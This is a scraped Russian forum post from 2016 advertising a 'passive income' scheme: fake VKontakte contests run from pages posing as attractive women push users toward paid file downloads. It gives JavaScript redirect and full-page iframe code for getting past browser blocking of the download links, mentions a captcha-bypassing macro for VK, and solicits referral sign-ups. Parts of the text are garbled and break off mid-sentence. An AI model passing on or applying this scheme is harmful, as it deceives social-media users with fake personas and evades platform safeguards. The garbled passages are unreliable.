1. Как Вы могли заметить, на форуме появился раздел дампов других форумов.
    Сливап, сеоха (В первом барыжат тем что юзеры выложили под хайд. Во втором, помимо барыжничества, еще говорят что в их приватном разделе есть крутые вещи, но вы узнаете что там только заплатив, а на деле оказывается что там галимый копипаст) и других копипаст форумов которые мусолят одни и те же курсы которые они друг у друга скачали|слили (нужное подчеркнуть).
    И соответсвенно Вы не могли не заметить какой там шлак Вам впаривают по 2000-3000 рублей за аккаунт, тьфу.
    Подробнее...

Пассивный заработок на ФО(УЛУЧШЕННАЯ СХЕМА) 600р в день без РЕФЕРАЛОВ и ВЛОЖЕНИЙ

Информация:
Тема в разделе "Схемы заработка", создана пользователем Dump_Bot, 10 сен 2016.
  1. Dump_Bot

Dump_Bot Бот дампов Бот форума
    • 3093/3811

Отдано:
    1 ГБ
    Скачано:
    0 байт
    Рейтинг:
    -
    Здравствуйте! Здесь я не буду писать вымышленные цифры в виде 2000р в день, только правда.

Предоставляю РАБОЧИЙ метод как работать по этой схеме:
    http://slivup.biz/to...khema-vozrozhd/

Мотивированый скриншот за СЕГОДНЯ! Где-то 2+ часа работы
    Для этого нам нужна хотя-бы 1 страничка В Контакте сисястой бабы. В Контакте можно лить траф практически на всё, не попадая в бан, нужно делать только это правильно. Как только у вас есть страница милой бабы приступаем к 1 шагу. 1. Нужно придумать конкурс, пример моего конкурса: Привет ребятки [​IMG]Только с одного ПОДСЛУШАНО, слилось около 50 скачиваний*Как обойти блокировку браузера?Тут немного сложнее, есть 2 вариант, 1 проще, а второй посложнее 1 ВАРИАНТСоздаем свой блог на blogger.com, заходим в настройки своего блога ---> ДИЗАЙН ---> Добавить гаджет ---> HTML/JAVASCRIPT и вписуем такой код: Код
    <script>
    window.location="ссылка на скачивания файла";
    </script>

ПЛЮСА: простота МИНУСА: если заходить с телефона перенаправления не будет 2 ВАРИАНТ Здесь нужен свой сайт. Создаем в корневой папке сайта любой файл с расширением .html и вписываем код:Код
    <html>
    <head>
    </head>

<body style="margin: 0;">

<iframe src="ВАША ССЫЛКа" style="border: 0; width: 100%; height: 100%">Your browser doesn't support iFrames.</iframe>
    </body>
    </html>

ПЛЮСА: Работает с любого устройства МИНУСА: НУЖЕН САЙТ

Буду благодарен за зелень

Регистрация по реф.ссылке:
    (СПАСИБО)
    *ПЛЮС РЕФКИ:
    КАЖДОМУ рефералу пришлю макрос который автоматически будет распозновать капчу в контакте(как напишу, работать будет через систему antigate) ОТВЕТЫ на вопросы и дополнитеные методы для слива трафика на скачивание CTterorist: 15 Сентябрь 2015 - 21:45

Загрузка...